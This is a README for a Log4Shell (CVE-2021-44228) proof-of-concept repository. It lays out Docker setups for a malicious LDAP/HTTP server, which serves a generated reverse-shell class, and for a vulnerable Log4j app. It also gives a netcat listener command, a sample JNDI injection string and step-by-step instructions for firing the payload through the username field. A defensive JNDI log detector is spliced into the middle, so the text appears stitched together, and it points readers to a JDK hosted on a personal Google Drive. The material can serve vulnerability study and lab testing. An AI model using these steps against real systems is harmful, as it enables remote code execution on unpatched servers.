## https://sploitus.com/exploit?id=4F57CC9C-B908-544E-92E7-92A49DE89B00
# Log4Shell Proof-Of-Concept

This repository is a Proof-of-Concept for the CVE-2021-44228 (Log4Shell) vulnerability.

It is derived from [This Repo](https://github.com/kozmer/log4j-shell-poc).

In this repository I have built an example of a vulnerable application and a demonstration of how it is exploited.

# Proof-of-concept Components

I have modified the upstream Python script to automate payload generation for this vulnerability.

In this repo there are two Dockerfiles for easy use as follows:

## Docker-Ldap

This Docker image downloads Java [jdk-8u20](https://drive.google.com/file/d/1WP2ncclnbViIkGwhfAaVesFoTiVFTCjQ/view?usp=sharing) from my Google Drive, because Oracle requires an account in order to download it.

If you do not trust this, you can modify the download step in the Dockerfile and fetch
the JDK from [here](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html) (make sure you download the Java SE Development Kit 8u20 version for Linux).

This Docker image runs a modified version of the script provided by [kozmer](https://github.com/kozmer/log4j-shell-poc), which does the following:
- Generates and compiles a Java class (named `Exploit`) that spawns a reverse shell; the JDK is required for this step.
- Starts a [JNDI LDAP server](https://github.com/mbechler/marshalsec) that answers lookups with a reference pointing at our HTTP server, where the payload resides.
- Opens a SimpleHTTPServer that serves the payload in response to the request triggered by the JNDI lookup.

Default ports used for this are `1389` for JNDI LDAP, `8000` for the SimpleHttpServer and **`9001`** for the reverse shell!

In order to compile and run this run:

```bash
sudo docker build -t log4j-ldap . 
sudo docker run -d -p 8000:8000 -p 1389:1389 log4j-ldap
```

Use `docker logs <containerID>` to see the app's logs and retrieve the exact input that needs to be provided to the vulnerable app.

For this PoC I have assumed the default IPs used by Docker (172.17.0.1/24); you can change them in the `./Docker-Ldap/run.sh` script to match your scenario.

## Docker-Vuln

This Docker image runs a vulnerable web application that uses an unpatched version of Log4j 2 and exposes it on port `8080`.

The app source is also available in `./Docker-Vuln`, credits to [kozmer](https://github.com/kozmer/log4j-shell-poc).

In order to compile and run this run:

```bash
# Build and run the vulnerable app from ./Docker-Vuln; the image tag is arbitrary
# (log4j-vuln is used here) and the app is exposed on port 8080 as described above.
sudo docker build -t log4j-vuln .
sudo docker run -d -p 8080:8080 log4j-vuln
```

**`Username is the injectable field!`**
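As an added defensive example (not part of this repository or of kozmer's code): a small Python detector that flags JNDI lookup strings in the kind of log line the vulnerable app writes for the username field. The log format and addresses are constructed; the detector flattens nested lookups first, since Log4j resolves those before the `jndi:` lookup runs, so a plain grep for `${jndi:` would miss them.

```python
import re
from collections import namedtuple
from typing import List

# One innermost ${...} lookup, i.e. one with no further "${" inside it.
INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup once nesting is flattened; scheme, host and port are captured.
JNDI = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/\s}]+)(?::(?P<port>\d+))?", re.I)
Finding = namedtuple("Finding", "line_no scheme host port")

def flatten(text: str, max_rounds: int = 8) -> str:
    """Collapse nested lookups the way Log4j does before it sees "jndi:", so the
    detector matches the string Log4j would actually resolve. Only lower/upper and
    the ':-default' fallback are modelled; any other lookup is left untouched."""
    def resolve(m):
        body = m.group(1)
        if body[:6].lower() == "lower:":
            return body[6:].lower()
        if body[:6].lower() == "upper:":
            return body[6:].upper()
        if ":-" in body:                  # ${name:-default} resolves to default
            return body.split(":-", 1)[1]
        return m.group(0)                 # unknown lookup: leave as is
    for _ in range(max_rounds):           # bounded so pathological input cannot loop
        new = INNER.sub(resolve, text)
        if new == text:
            break
        text = new
    return text

def scan(lines: List[str]) -> List[Finding]:
    """Return one Finding per JNDI lookup found in the given log lines."""
    found = []
    for n, line in enumerate(lines, start=1):
        for m in JNDI.finditer(flatten(line)):
            port = int(m.group("port")) if m.group("port") else None
            found.append(Finding(n, m.group("scheme").lower(), m.group("host"), port))
    return found

# Constructed sample of what the vulnerable app's login log might contain.
SAMPLE_LOG = [
    '10.0.0.5 POST /login user="alice" status=401',
    '10.0.0.9 POST /login user="${jndi:ldap://172.17.0.1:1389/Exploit}" status=401',
    '10.0.0.9 POST /login user="${${lower:j}ndi:LDAP://172.17.0.1:1389/a}" status=401',
    '10.0.0.7 GET / ua="Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: JNDI lookup via {f.scheme} to {f.host}:{f.port}")
```

The extracted scheme, host and port are what you would feed into an egress block or an investigation of which hosts the application was told to contact.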


## Netcat listener

To accept the reverse shell you must start a netcat listener on port **`9001`**:

```bash
nc -lvnp 9001
```

# How to use

After downloading the repo, make sure you have Docker Engine installed and that no other Docker containers are running on your machine.

- Run the `config.sh` script to build the images and start them (the script runs with root privileges; modify it as needed).
- Open a netcat listener on port **`9001`**.
- Fire up your browser and navigate to `localhost:8080`.
- Extract the payload from the log4j-ldap container logs (`docker logs <containerID>`).
- Enter the payload in the username field and any password.
- Enjoy!

# Useful resources:

- [A Journey From JNDI/LDAP Manipulation to Remote Code Execution Dream Land](https://www.youtube.com/watch?v=Y8a5nB-vy78)
- [Apache Log4j Security Vulnerabilities](https://logging.apache.org/log4j/2.x/security.html)
- [CVE-2021-44228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-44228)
- [CVE-2021-44228 Detail](https://nvd.nist.gov/vuln/detail/CVE-2021-44228)
- [Log4j Lookups in Depth](https://www.youtube.com/watch?v=iI9Dz3zN4d8)
- [Log4j Vulnerability](https://www.youtube.com/watch?v=w2F67LbEtnk)
- [CVE-2021-44228 - Log4j - MINECRAFT VULNERABLE](https://www.youtube.com/watch?v=7qoPDq41xhQ)
- [Log4Shell: RCE 0-day exploit found in log4j 2](https://www.lunasec.io/docs/blog/log4j-zero-day/)
- [How to Automatically Mitigate Log4Shell via a Live Patch](https://www.lunasec.io/docs/blog/log4shell-live-patch/)
- [Understanding Log4Shell via Exploitation and Live Patching](https://www.lunasec.io/docs/blog/log4shell-live-patch-technical/)
- [How To Detect and Mitigate the Log4Shell Vulnerability](https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/)

# Timeline of events that led to the vulnerability:

- [JNDI Lookup plugin support](https://issues.apache.org/jira/browse/LOG4J2-313)
- [Ability to disable (date) lookup completely](https://issues.apache.org/jira/browse/LOG4J2-905)
- [Add property to disable message pattern converter lookups](https://issues.apache.org/jira/browse/LOG4J2-2109)